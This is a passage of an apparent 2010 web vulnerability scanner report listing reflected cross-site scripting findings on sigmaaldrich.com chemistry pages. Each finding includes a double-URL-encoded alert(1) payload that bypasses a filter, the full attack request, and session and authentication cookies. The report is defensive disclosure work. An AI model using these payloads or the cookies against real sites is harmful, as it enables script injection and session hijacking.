                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry7a1df";alert(1)//bbb9e6e45da/drug-discovery.html","E404") ;
   </script>
...[SNIP]...

1.59. http://www.sigmaaldrich.com/chemistry/drug-discovery.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/drug-discovery.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80f09%2522%253balert%25281%2529%252f%252f6b5e9380a23 was submitted in the REST URL parameter 2. This input was echoed as 80f09";alert(1)//6b5e9380a23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry/80f09%2522%253balert%25281%2529%252f%252f6b5e9380a23 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:27 GMT
Content-Length: 28914
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry/80f09";alert(1)//6b5e9380a23","E404") ;
   </script>
...[SNIP]...

1.60. http://www.sigmaaldrich.com/chemistry/greener-alternatives.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/greener-alternatives.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51bd0%2522%253balert%25281%2529%252f%252f15cc2c92527 was submitted in the REST URL parameter 1. This input was echoed as 51bd0";alert(1)//15cc2c92527 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry51bd0%2522%253balert%25281%2529%252f%252f15cc2c92527/greener-alternatives.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:19 GMT
Content-Length: 28939
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry51bd0";alert(1)//15cc2c92527/greener-alternatives.html","E404") ;
   </script>
...[SNIP]...

1.61. http://www.sigmaaldrich.com/chemistry/greener-alternatives.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/greener-alternatives.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21ccf%2522%253balert%25281%2529%252f%252ffbceb469c33 was submitted in the REST URL parameter 2. This input was echoed as 21ccf";alert(1)//fbceb469c33 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry/21ccf%2522%253balert%25281%2529%252f%252ffbceb469c33 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:21 GMT
Content-Length: 28914
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry/21ccf";alert(1)//fbceb469c33","E404") ;
   </script>
...[SNIP]...

1.62. http://www.sigmaaldrich.com/chemistry/labware-and-equipment.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/labware-and-equipment.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad9b4%2522%253balert%25281%2529%252f%252f8332976da4b was submitted in the REST URL parameter 1. This input was echoed as ad9b4";alert(1)//8332976da4b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistryad9b4%2522%253balert%25281%2529%252f%252f8332976da4b/labware-and-equipment.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:24 GMT
Content-Length: 28940
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistryad9b4";alert(1)//8332976da4b/labware-and-equipment.html","E404") ;
   </script>
...[SNIP]...

1.63. http://www.sigmaaldrich.com/chemistry/labware-and-equipment.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/labware-and-equipment.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51772%2522%253balert%25281%2529%252f%252f0521d24ee19 was submitted in the REST URL parameter 2. This input was echoed as 51772";alert(1)//0521d24ee19 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character. The payload above relies on exactly this: %2522 survives the web server's single decode as %22, and the application's own second decode turns it into the double quote that closes the string.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry/51772%2522%253balert%25281%2529%252f%252f0521d24ee19 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:27 GMT
Content-Length: 28914
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry/51772";alert(1)//0521d24ee19","E404") ;
   </script>
...[SNIP]...

1.64. http://www.sigmaaldrich.com/chemistry/solvents.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/solvents.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a4cf%2522%253balert%25281%2529%252f%252f139ebbace98 was submitted in the REST URL parameter 1. This input was echoed as 9a4cf";alert(1)//139ebbace98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character. The payload above relies on exactly this: %2522 survives the web server's single decode as %22, and the application's own second decode turns it into the double quote that closes the string.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

